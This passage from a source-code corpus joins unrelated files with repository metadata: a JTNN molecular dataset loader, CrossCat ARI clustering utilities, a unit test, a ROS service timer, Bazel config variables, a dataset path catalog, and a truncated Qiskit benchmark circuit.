] | null | null | null | examples/generative_models/jtnn/jtnn/datautils.py | seqRep/dgl-lifesci | c4bd45be6dbb59dc270957ed90bb19d9ed6dc157 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
import dgl
import os
import torch
from dgl.data.utils import download, extract_archive, get_download_dir
from torch.utils.data import Dataset
from .mol_tree import Vocab, DGLMolTree
from .chemutils import mol2dgl_dec, mol2dgl_enc
ELEM_LIST = ['C', 'N', 'O', 'S', 'F', 'Si', 'P', 'Cl', 'Br', 'Mg', 'Na', 'Ca',
'Fe', 'Al', 'I', 'B', 'K', 'Se', 'Zn', 'H', 'Cu', 'Mn', 'unknown']
ATOM_FDIM_DEC = len(ELEM_LIST) + 6 + 5 + 1
BOND_FDIM_DEC = 5
MAX_NB = 10
PAPER = os.getenv('PAPER', False)
_url = 'https://s3-ap-southeast-1.amazonaws.com/dgl-data-cn/dataset/jtnn.zip'
def _unpack_field(examples, field):
return [e[field] for e in examples]
def _set_node_id(mol_tree, vocab):
wid = []
for i, node in enumerate(mol_tree.nodes_dict):
mol_tree.nodes_dict[node]['idx'] = i
wid.append(vocab.get_index(mol_tree.nodes_dict[node]['smiles']))
return wid
class JTNNDataset(Dataset):
def __init__(self, data, vocab, training=True):
self.dir = get_download_dir()
self.zip_file_path='{}/jtnn.zip'.format(self.dir)
download(_url, path=self.zip_file_path)
extract_archive(self.zip_file_path, '{}/jtnn'.format(self.dir))
print('Loading data...')
if data in ['train', 'test']:
data_file = '{}/jtnn/{}.txt'.format(self.dir, data)
else:
data_file = data
with open(data_file) as f:
self.data = [line.strip("\r\n ").split()[0] for line in f]
self.vocab_file = '{}/jtnn/{}.txt'.format(self.dir, vocab)
print('Loading finished.')
print('\tNum samples:', len(self.data))
print('\tVocab file:', self.vocab_file)
self.training = training
self.vocab = Vocab([x.strip("\r\n ") for x in open(self.vocab_file)])
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
smiles = self.data[idx]
mol_tree = DGLMolTree(smiles)
mol_tree.recover()
mol_tree.assemble()
wid = _set_node_id(mol_tree, self.vocab)
# prebuild the molecule graph
mol_graph, atom_x_enc, bond_x_enc = mol2dgl_enc(mol_tree.smiles)
result = {
'mol_tree': mol_tree,
'mol_graph': mol_graph,
'atom_x_enc': atom_x_enc,
'bond_x_enc': bond_x_enc,
'wid': wid,
}
if not self.training:
return result
# prebuild the candidate graph list
cands = []
for node_id, node in mol_tree.nodes_dict.items():
# fill in ground truth
if node['label'] not in node['cands']:
node['cands'].append(node['label'])
node['cand_mols'].append(node['label_mol'])
if node['is_leaf'] or len(node['cands']) == 1:
continue
cands.extend([(cand, mol_tree, node_id)
for cand in node['cand_mols']])
if len(cands) > 0:
cand_graphs, atom_x_dec, bond_x_dec, tree_mess_src_e, \
tree_mess_tgt_e, tree_mess_tgt_n = mol2dgl_dec(cands)
else:
cand_graphs = []
atom_x_dec = torch.zeros(0, ATOM_FDIM_DEC)
bond_x_dec = torch.zeros(0, BOND_FDIM_DEC)
tree_mess_src_e = torch.zeros(0, 2).long()
tree_mess_tgt_e = torch.zeros(0, 2).long()
tree_mess_tgt_n = torch.zeros(0).long()
# prebuild the stereoisomers
cands = mol_tree.stereo_cands
if len(cands) > 1:
if mol_tree.smiles3D not in cands:
cands.append(mol_tree.smiles3D)
stereo_graphs = [mol2dgl_enc(c) for c in cands]
stereo_cand_graphs, stereo_atom_x_enc, stereo_bond_x_enc = \
zip(*stereo_graphs)
stereo_atom_x_enc = torch.cat(stereo_atom_x_enc)
stereo_bond_x_enc = torch.cat(stereo_bond_x_enc)
stereo_cand_label = [(cands.index(mol_tree.smiles3D), len(cands))]
else:
stereo_cand_graphs = []
stereo_atom_x_enc = torch.zeros(0, atom_x_enc.shape[1])
stereo_bond_x_enc = torch.zeros(0, bond_x_enc.shape[1])
stereo_cand_label = []
result.update({
'cand_graphs': cand_graphs,
'atom_x_dec': atom_x_dec,
'bond_x_dec': bond_x_dec,
'tree_mess_src_e': tree_mess_src_e,
'tree_mess_tgt_e': tree_mess_tgt_e,
'tree_mess_tgt_n': tree_mess_tgt_n,
'stereo_cand_graphs': stereo_cand_graphs,
'stereo_atom_x_enc': stereo_atom_x_enc,
'stereo_bond_x_enc': stereo_bond_x_enc,
'stereo_cand_label': stereo_cand_label,
})
return result
class JTNNCollator(object):
def __init__(self, vocab, training):
self.vocab = vocab
self.training = training
@staticmethod
def _batch_and_set(graphs, atom_x, bond_x, flatten):
if flatten:
graphs = [g for f in graphs for g in f]
graph_batch = dgl.batch(graphs)
graph_batch.ndata['x'] = atom_x
graph_batch.edata.update({
'x': bond_x,
'src_x': atom_x.new(bond_x.shape[0], atom_x.shape[1]).zero_(),
})
return graph_batch
def __call__(self, examples):
# get list of trees
mol_trees = _unpack_field(examples, 'mol_tree')
wid = _unpack_field(examples, 'wid')
for _wid, mol_tree in zip(wid, mol_trees):
mol_tree.ndata['wid'] = torch.LongTensor(_wid)
# TODO: either support pickling or get around ctypes pointers using scipy
# batch molecule graphs
mol_graphs = _unpack_field(examples, 'mol_graph')
atom_x = torch.cat(_unpack_field(examples, 'atom_x_enc'))
bond_x = torch.cat(_unpack_field(examples, 'bond_x_enc'))
mol_graph_batch = self._batch_and_set(mol_graphs, atom_x, bond_x, False)
result = {
'mol_trees': mol_trees,
'mol_graph_batch': mol_graph_batch,
}
if not self.training:
return result
# batch candidate graphs
cand_graphs = _unpack_field(examples, 'cand_graphs')
cand_batch_idx = []
atom_x = torch.cat(_unpack_field(examples, 'atom_x_dec'))
bond_x = torch.cat(_unpack_field(examples, 'bond_x_dec'))
tree_mess_src_e = _unpack_field(examples, 'tree_mess_src_e')
tree_mess_tgt_e = _unpack_field(examples, 'tree_mess_tgt_e')
tree_mess_tgt_n = _unpack_field(examples, 'tree_mess_tgt_n')
n_graph_nodes = 0
n_tree_nodes = 0
for i in range(len(cand_graphs)):
tree_mess_tgt_e[i] += n_graph_nodes
tree_mess_src_e[i] += n_tree_nodes
tree_mess_tgt_n[i] += n_graph_nodes
n_graph_nodes += sum(g.number_of_nodes() for g in cand_graphs[i])
n_tree_nodes += mol_trees[i].number_of_nodes()
cand_batch_idx.extend([i] * len(cand_graphs[i]))
tree_mess_tgt_e = torch.cat(tree_mess_tgt_e)
tree_mess_src_e = torch.cat(tree_mess_src_e)
tree_mess_tgt_n = torch.cat(tree_mess_tgt_n)
cand_graph_batch = self._batch_and_set(cand_graphs, atom_x, bond_x, True)
# batch stereoisomers
stereo_cand_graphs = _unpack_field(examples, 'stereo_cand_graphs')
atom_x = torch.cat(_unpack_field(examples, 'stereo_atom_x_enc'))
bond_x = torch.cat(_unpack_field(examples, 'stereo_bond_x_enc'))
stereo_cand_batch_idx = []
for i in range(len(stereo_cand_graphs)):
stereo_cand_batch_idx.extend([i] * len(stereo_cand_graphs[i]))
if len(stereo_cand_batch_idx) > 0:
stereo_cand_labels = [
(label, length)
for ex in _unpack_field(examples, 'stereo_cand_label')
for label, length in ex
]
stereo_cand_labels, stereo_cand_lengths = zip(*stereo_cand_labels)
stereo_cand_graph_batch = self._batch_and_set(
stereo_cand_graphs, atom_x, bond_x, True)
else:
stereo_cand_labels = []
stereo_cand_lengths = []
stereo_cand_graph_batch = None
stereo_cand_batch_idx = []
result.update({
'cand_graph_batch': cand_graph_batch,
'cand_batch_idx': cand_batch_idx,
'tree_mess_tgt_e': tree_mess_tgt_e,
'tree_mess_src_e': tree_mess_src_e,
'tree_mess_tgt_n': tree_mess_tgt_n,
'stereo_cand_graph_batch': stereo_cand_graph_batch,
'stereo_cand_batch_idx': stereo_cand_batch_idx,
'stereo_cand_labels': stereo_cand_labels,
'stereo_cand_lengths': stereo_cand_lengths,
})
return result
| 37.785714 | 81 | 0.603136 |
e0a5b48147e5339d4b061e16b74df66abe2ffbc1 | 8,727 | py | Python | src/utils/convergence_test_utils.py | vishalbelsare/crosscat | 1f2ac5a43a50ebd7aaa89f0c5ac3815a170848c5 | [
"Apache-2.0"
] | 207 | 2015-09-23T08:35:22.000Z | 2021-11-24T23:05:55.000Z | src/utils/convergence_test_utils.py | vishalbelsare/crosscat | 1f2ac5a43a50ebd7aaa89f0c5ac3815a170848c5 | [
"Apache-2.0"
] | 52 | 2015-09-18T21:19:54.000Z | 2018-12-15T21:17:32.000Z | src/utils/convergence_test_utils.py | vishalbelsare/crosscat | 1f2ac5a43a50ebd7aaa89f0c5ac3815a170848c5 | [
"Apache-2.0"
] | 33 | 2015-10-30T22:50:30.000Z | 2020-07-01T00:29:55.000Z | #
# Copyright (c) 2010-2016, MIT Probabilistic Computing Project
#
# Lead Developers: Dan Lovell and Jay Baxter
# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka
# Research Leads: Vikash Mansinghka, Patrick Shafto
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy
#
import crosscat.cython_code.State as State
import crosscat.utils.general_utils as gu
import crosscat.utils.sample_utils as su
def calc_ari(group_idx_list_1, group_idx_list_2):
from collections import defaultdict
def make_set_dict(list):
set_dict = defaultdict(set)
add_element = lambda idx_group: set_dict[idx_group[1]].add(idx_group[0])
map(add_element, enumerate(list))
return set_dict
def check_short_circuit(set_dict_1, list_1, set_dict_2, list_2):
both_all_apart = len(set_dict_1) == len(list_1) and \
len(set_dict_2) == len(list_2)
both_all_together = len(set_dict_1) == 1 and len(set_dict_2) == 1
return both_all_apart or both_all_together
def gen_contingency_data(set_dict_1, set_dict_2):
##https://en.wikipedia.org/wiki/Rand_index#The_contingency_table
array_dim = (len(set_dict_1), len(set_dict_2))
Ns = numpy.ndarray(array_dim)
for idx_1, value1 in enumerate(set_dict_1.values()):
for idx_2, value2 in enumerate(set_dict_2.values()):
Ns[idx_1, idx_2] = len(value1.intersection(value2))
As = Ns.sum(axis=1)
Bs = Ns.sum(axis=0)
return Ns, As, Bs
def choose_2_sum(x):
return sum(x * (x - 1) / 2.0)
group_idx_dict_1 = make_set_dict(group_idx_list_1)
group_idx_dict_2 = make_set_dict(group_idx_list_2)
if check_short_circuit(group_idx_dict_1, group_idx_list_1,
group_idx_dict_2, group_idx_list_2):
return 1.0
Ns, As, Bs = gen_contingency_data(group_idx_dict_1, group_idx_dict_2)
n_choose_2 = choose_2_sum(numpy.array([len(group_idx_list_1)]))
cross_sums = choose_2_sum(Ns[Ns>1])
a_sums = choose_2_sum(As)
b_sums = choose_2_sum(Bs)
numerator = n_choose_2 * cross_sums - a_sums * b_sums
denominator = .5 * n_choose_2 * (a_sums + b_sums) - a_sums * b_sums
return numerator / denominator
def determine_synthetic_column_ground_truth_assignments(num_cols, num_views):
num_cols_per_view = num_cols / num_views
view_assignments = []
for view_idx in range(num_views):
view_assignments.extend([view_idx] * num_cols_per_view)
return view_assignments
def truth_from_permute_indices(data_inverse_permutation_indices, num_rows,num_cols,num_views, num_clusters):
# We assume num_rows is divisible by num_clusters and num_cols is divisible by num_views
num_cols_per_view = num_cols/num_views
view_assignments = []
for viewindx in range(num_views):
view_assignments = view_assignments + [viewindx]*num_cols_per_view
num_rows_per_cluster = num_rows/num_clusters
reference_list = []
for clusterindx in range(num_clusters):
reference_list = reference_list + [clusterindx]*num_rows_per_cluster
X_D_truth = []
for viewindx in range(num_views):
X_D_truth.append([a for (b,a) in sorted(zip(data_inverse_permutation_indices[viewindx], reference_list))])
return view_assignments, X_D_truth
def ARI_CrossCat(Xc, Xrv, XRc, XRrv):
''' Adjusted Rand Index (ARI) calculation for a CrossCat clustered table
To calculate ARI based on the CrossCat partition, each cell in the
table is considered as an instance to be assigned to a cluster. A cluster
is defined by both the view index AND the category index. In other words,
if, and only if, two cells, regardless of which columns and rows they belong
to, are lumped into the same view and category, the two cells are considered
to be in the same cluster.
For a table of size Nrow x Ncol
Xc: (1 x Ncol) array of view assignment for each column.
Note: It is assumed that the view indices are consecutive integers
starting from 0. Hence, the number of views is equal to highest
view index plus 1.
Xrv: (Nrow x Nview) array where each row is the assignmennt of categories for the
corresponding row in the data table. The i-th element in a row
corresponds to the category assignment of the i-th view of that row.
XRc and XRrv have the same format as Xr and Xrv respectively.
The ARI index is calculated from the comparison of the table clustering
define by (XRc, XRrv) and (Xc, Xrv).
'''
Xrv = Xrv.T
XRrv = XRrv.T
# Find the highest category index of all views
max_cat_index = numpy.max(Xrv)
# re-assign category indices so that they have different values in
# different views
Xrv = Xrv + numpy.arange(0,Xrv.shape[1])*(max_cat_index+1)
# similarly for the reference partition
max_cat_index = numpy.max(XRrv)
XRrv = XRrv + numpy.arange(0,XRrv.shape[1])*(max_cat_index+1)
# Table clustering assignment for the first partition
CellClusterAssgn = numpy.zeros((Xrv.shape[0], Xc.size))
for icol in range(Xc.size):
CellClusterAssgn[:,icol]=Xrv[:,Xc[icol]]
# Flatten the table to a 1-D array compatible with the ARI function
CellClusterAssgn = CellClusterAssgn.reshape(CellClusterAssgn.size)
# Table clustering assignment for the second partition
RefCellClusterAssgn = numpy.zeros((Xrv.shape[0], Xc.size))
for icol in range(Xc.size):
RefCellClusterAssgn[:,icol]=XRrv[:,XRc[icol]]
# Flatten the table
RefCellClusterAssgn = RefCellClusterAssgn.reshape(RefCellClusterAssgn.size)
# Compare the two partitions using ARI
ARI = calc_ari(RefCellClusterAssgn, CellClusterAssgn)
ARI_viewonly = calc_ari(Xc, XRc)
return ARI, ARI_viewonly
def get_column_ARI(X_L, view_assignment_truth):
view_assignments = X_L['column_partition']['assignments']
ARI = calc_ari(view_assignments, view_assignment_truth)
return ARI
def get_column_ARIs(X_L_list, view_assignment_truth):
get_column_ARI_helper = lambda X_L: \
get_column_ARI(X_L, view_assignment_truth)
ARIs = map(get_column_ARI_helper, X_L_list)
return ARIs
def multi_chain_ARI(X_L_list, X_D_List, view_assignment_truth, X_D_truth, return_list=False):
num_chains = len(X_L_list)
ari_table = numpy.zeros(num_chains)
ari_views = numpy.zeros(num_chains)
for chainindx in range(num_chains):
view_assignments = X_L_list[chainindx]['column_partition']['assignments']
curr_ari_table, curr_ari_views = ARI_CrossCat(numpy.asarray(view_assignments), numpy.asarray(X_D_List[chainindx]), numpy.asarray(view_assignment_truth), numpy.asarray(X_D_truth))
ari_table[chainindx] = curr_ari_table
ari_views[chainindx] = curr_ari_views
ari_table_mean = numpy.mean(ari_table)
ari_views_mean = numpy.mean(ari_views)
if return_list:
return ari_table, ari_views
else:
return ari_table_mean, ari_views_mean
def create_test_set(M_c, T, X_L, X_D, n_test, seed_seed=0):
sample_row_idx = len(T) + 1
n_cols = len(T[0])
Y = []
Q = [(sample_row_idx, col_idx) for col_idx in range(n_cols)]
int_generator = gu.int_generator(seed_seed)
get_next_seed = lambda: int_generator.next()
samples = su.simple_predictive_sample(M_c, X_L, X_D, Y, Q, get_next_seed, n=n_test)
return samples
# FIXME: remove dependence on T as input
# by making p_State constructor actually use only suffstats
def calc_mean_test_log_likelihood(M_c, T, X_L, X_D, T_test):
state = State.p_State(M_c, T, X_L, X_D)
test_log_likelihoods = map(state.calc_row_predictive_logp, T_test)
mean_test_log_likelihood = numpy.mean(test_log_likelihoods)
return mean_test_log_likelihood
def calc_mean_test_log_likelihoods(M_c, T, X_L_list, X_D_list, T_test):
mean_test_log_likelihoods = []
for X_L, X_D in zip(X_L_list, X_D_list):
mean_test_log_likelihood = calc_mean_test_log_likelihood(M_c, T, X_L,
X_D, T_test)
mean_test_log_likelihoods.append(mean_test_log_likelihood)
return mean_test_log_likelihoods
| 44.075758 | 186 | 0.719147 |
4debb766c3fe5106b666815ce1a1772e065de58a | 727 | py | Python | irida_staramr_results/test_unit/test_downloader.py | phac-nml/irida-staramr-results | 7574b6eead97929605bdaf226cb34062b20c1dac | [
"Apache-2.0"
] | 2 | 2021-04-19T16:07:45.000Z | 2021-07-05T15:09:04.000Z | irida_staramr_results/test_unit/test_downloader.py | phac-nml/irida-staramr-results | 7574b6eead97929605bdaf226cb34062b20c1dac | [
"Apache-2.0"
] | 16 | 2021-02-05T19:25:13.000Z | 2021-11-30T18:01:16.000Z | irida_staramr_results/test_unit/test_downloader.py | phac-nml/irida-staramr-results | 7574b6eead97929605bdaf226cb34062b20c1dac | [
"Apache-2.0"
] | 3 | 2021-03-08T14:01:15.000Z | 2021-07-20T16:39:21.000Z | import unittest
from irida_staramr_results.downloader import _get_output_file_name
class TestDownloader(unittest.TestCase):
def setUp(self):
print("\nStarting " + self.__module__ + ": " + self._testMethodName)
def tearDown(self):
pass
def test_get_output_file(self):
"""
Test output file name generation is correct.
:return:
"""
fake_prefix_name = "out"
fake_timestamp_in_millisec = 1611090794000
res_milli = _get_output_file_name(fake_prefix_name, fake_timestamp_in_millisec)
self.assertNotIn(".xlsx", res_milli)
self.assertEqual(res_milli, "out-2021-01-19T21-13-14")
if __name__ == '__main__':
unittest.main()
| 23.451613 | 87 | 0.672627 |
b373fdbd5517742623a5158e4b39ae13ef4c20fe | 4,010 | py | Python | simulation/src/launch_tools/scripts/launch_tools/services_timer.py | LeonardII/KitCarFork | b2802c5b08cc8250446ce3731cb622af064db4ca | [
"MIT"
] | null | null | null | simulation/src/launch_tools/scripts/launch_tools/services_timer.py | LeonardII/KitCarFork | b2802c5b08cc8250446ce3731cb622af064db4ca | [
"MIT"
] | null | null | null | simulation/src/launch_tools/scripts/launch_tools/services_timer.py | LeonardII/KitCarFork | b2802c5b08cc8250446ce3731cb622af064db4ca | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Copyright (c) 2013, Systems, Robotics and Vision Group University of the Balearican
Islands All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Systems, Robotics and Vision Group, University of
the Balearican Islands nor the names of its contributors may be used to
endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import roslib
roslib.load_manifest("launch_tools")
import sys
import threading
import rospy
import rosservice
## Class for calling a service using a timer.
class TimedService(threading.Thread):
## The constructor
# @param self The object pointer.
# @param name The service name this class is going to call
# @param freq The desired timer period
def __init__(self, name, period):
threading.Thread.__init__(self)
self._service_name = name
self._service_period = period
## Run function required by threading library
def run(self):
rospy.wait_for_service(self._service_name)
rospy.Timer(rospy.Duration(self._service_period), self.callback)
rospy.loginfo(
"Initialized timer for service: \n\t* Name: %s\n\t* Period: %f ",
self._service_name,
self._service_period,
)
## Timer callback
# @param event The event that has generated this callback
def callback(self, event):
rospy.wait_for_service(self._service_name)
service_class = rosservice.get_service_class_by_name(self._service_name)
try:
service = rospy.ServiceProxy(self._service_name, service_class)
service()
rospy.loginfo("Service %s called.", self._service_name)
except rospy.ServiceException, e:
rospy.logwarn("Service %s call failed: %s", self._service_name, e)
## @var _service_name
# The service name going to be called
_service_name = "service"
## @var _service_period
# The timer period to call the service
_service_period = 1.0
## Print usage for people that does not deserve to use this awesome python node.
def usage():
return "%s service period [service period ...]" % sys.argv[0]
## main function
if __name__ == "__main__":
rospy.init_node("services_timer")
if len(sys.argv) >= 3:
names = sys.argv[1 : len(sys.argv) : 2]
periods = sys.argv[2 : len(sys.argv) : 2]
rospy.loginfo("names : %s", names)
rospy.loginfo("periods : %s", periods)
ts_list = []
for name, period in zip(names, periods):
ts_list.append(TimedService(str(name), float(period)))
for ts in ts_list:
ts.start()
else:
rospy.loginfo(usage())
sys.exit(1)
rospy.spin()
| 37.830189 | 86 | 0.702993 |
b997b907b13ae65512d576ca309ad7a35494a3e4 | 565 | bzl | Python | consensus/conf.bzl | francescolavra/entangled | b580441a79859455aff77fb158db31f582c24847 | [
"Apache-2.0"
] | null | null | null | consensus/conf.bzl | francescolavra/entangled | b580441a79859455aff77fb158db31f582c24847 | [
"Apache-2.0"
] | null | null | null | consensus/conf.bzl | francescolavra/entangled | b580441a79859455aff77fb158db31f582c24847 | [
"Apache-2.0"
] | null | null | null | CONSENSUS_MAINNET_VARIABLES = [
"SNAPSHOT_CONF_FILE='\"external/snapshot_conf_mainnet/file/downloaded\"'",
"SNAPSHOT_SIG_FILE='\"external/snapshot_sig_mainnet/file/downloaded\"'",
"SNAPSHOT_FILE='\"external/snapshot_mainnet/file/downloaded\"'",
"NUM_KEYS_IN_MILESTONE=20",
"MWM=14",
]
CONSENSUS_TESTNET_VARIABLES = [
"SNAPSHOT_CONF_FILE='\"external/snapshot_conf_testnet/file/downloaded\"'",
"SNAPSHOT_SIG_FILE='\"\"'",
"SNAPSHOT_FILE='\"external/snapshot_testnet/file/downloaded\"'",
"NUM_KEYS_IN_MILESTONE=22",
"MWM=9",
]
| 35.3125 | 78 | 0.723894 |
f986d49847702197173712d11338d000520ba73f | 3,867 | py | Python | lib/datasets/dataset_catalog.py | BarneyQiao/pcl.pytorch | 4e0280e5e1470f705e620eda26f881d627c5016c | [
"MIT"
] | 233 | 2019-05-10T07:17:42.000Z | 2022-03-30T09:24:16.000Z | lib/datasets/dataset_catalog.py | BarneyQiao/pcl.pytorch | 4e0280e5e1470f705e620eda26f881d627c5016c | [
"MIT"
] | 78 | 2019-05-10T21:10:47.000Z | 2022-03-29T13:57:32.000Z | lib/datasets/dataset_catalog.py | BarneyQiao/pcl.pytorch | 4e0280e5e1470f705e620eda26f881d627c5016c | [
"MIT"
] | 57 | 2019-05-10T07:17:37.000Z | 2022-03-24T04:43:24.000Z | # Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""Collection of available datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
from core.config import cfg
# Path to data dir
_DATA_DIR = cfg.DATA_DIR
# Required dataset entry keys
IM_DIR = 'image_directory'
ANN_FN = 'annotation_file'
# Optional dataset entry keys
IM_PREFIX = 'image_prefix'
DEVKIT_DIR = 'devkit_directory'
RAW_DIR = 'raw_dir'
# Available datasets
DATASETS = {
'coco_2014_train': {
IM_DIR:
_DATA_DIR + '/coco/images/train2014',
ANN_FN:
_DATA_DIR + '/coco/annotations/instances_train2014.json'
},
'coco_2014_val': {
IM_DIR:
_DATA_DIR + '/coco/images/val2014',
ANN_FN:
_DATA_DIR + '/coco/annotations/instances_val2014.json'
},
'coco_2014_minival': {
IM_DIR:
_DATA_DIR + '/coco/images/val2014',
ANN_FN:
_DATA_DIR + '/coco/annotations/instances_minival2014.json'
},
'coco_2014_valminusminival': {
IM_DIR:
_DATA_DIR + '/coco/images/val2014',
ANN_FN:
_DATA_DIR + '/coco/annotations/instances_valminusminival2014.json'
},
'coco_2015_test': {
IM_DIR:
_DATA_DIR + '/coco/images/test2015',
ANN_FN:
_DATA_DIR + '/coco/annotations/image_info_test2015.json'
},
'coco_2015_test-dev': {
IM_DIR:
_DATA_DIR + '/coco/images/test2015',
ANN_FN:
_DATA_DIR + '/coco/annotations/image_info_test-dev2015.json'
},
'coco_2017_train': {
IM_DIR:
_DATA_DIR + '/coco/images/train2017',
ANN_FN:
_DATA_DIR + '/coco/annotations/instances_train2017.json',
},
'coco_2017_val': {
IM_DIR:
_DATA_DIR + '/coco/images/val2017',
ANN_FN:
_DATA_DIR + '/coco/annotations/instances_val2017.json',
},
'coco_2017_test': { # 2017 test uses 2015 test images
IM_DIR:
_DATA_DIR + '/coco/images/test2015',
ANN_FN:
_DATA_DIR + '/coco/annotations/image_info_test2017.json',
IM_PREFIX:
'COCO_test2015_'
},
'coco_2017_test-dev': { # 2017 test-dev uses 2015 test images
IM_DIR:
_DATA_DIR + '/coco/images/test2015',
ANN_FN:
_DATA_DIR + '/coco/annotations/image_info_test-dev2017.json',
IM_PREFIX:
'COCO_test2015_'
},
'voc_2007_trainval': {
IM_DIR:
_DATA_DIR + '/VOC2007/JPEGImages',
ANN_FN:
_DATA_DIR + '/VOC2007/annotations/voc_2007_trainval.json',
DEVKIT_DIR:
_DATA_DIR
},
'voc_2007_test': {
IM_DIR:
_DATA_DIR + '/VOC2007/JPEGImages',
ANN_FN:
_DATA_DIR + '/VOC2007/annotations/voc_2007_test.json',
DEVKIT_DIR:
_DATA_DIR
},
'voc_2012_trainval': {
IM_DIR:
_DATA_DIR + '/VOC2012/JPEGImages',
ANN_FN:
_DATA_DIR + '/VOC2012/annotations/voc_2012_trainval.json',
DEVKIT_DIR:
_DATA_DIR
}
}
| 29.746154 | 78 | 0.605379 |
bf1ee9086b57e9e853ba008e72e1a67bbfca0ff8 | 4,438 | py | Python | benchmark/startQiskit_QC1048.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_QC1048.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_QC1048.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=5
# total number=51
import cirq
import qiskit
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[0]) # number=38
prog.cz(input_qubit[1],input_qubit[0]) # number=39
prog.h(input_qubit[0]) # number=40
prog.h(input_qubit[0]) # number=48
prog.cz(input_qubit[1],input_qubit[0]) # number=49
prog.h(input_qubit[0]) # number=50
prog.z(input_qubit[1]) # number=46
prog.cx(input_qubit[1],input_qubit[0]) # number=47
prog.h(input_qubit[0]) # number=32
prog.cz(input_qubit[1],input_qubit[0]) # number=33
prog.h(input_qubit[0]) # number=34
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.cx(input_qubit[3],input_qubit[0]) # number=41
prog.z(input_qubit[3]) # number=42
prog.cx(input_qubit[3],input_qubit[0]) # number=43
prog.cx(input_qubit[1],input_qubit[3]) # number=44
prog.x(input_qubit[0]) # number=9
prog.x(input_qubit[1]) # number=10
prog.x(input_qubit[2]) # number=11
prog.cx(input_qubit[0],input_qubit[3]) # number=35
prog.x(input_qubit[3]) # number=36
prog.cx(input_qubit[0],input_qubit[3]) # number=37
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.cx(input_qubit[1],input_qubit[0]) # number=24
prog.x(input_qubit[0]) # number=25
prog.cx(input_qubit[1],input_qubit[0]) # number=26
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
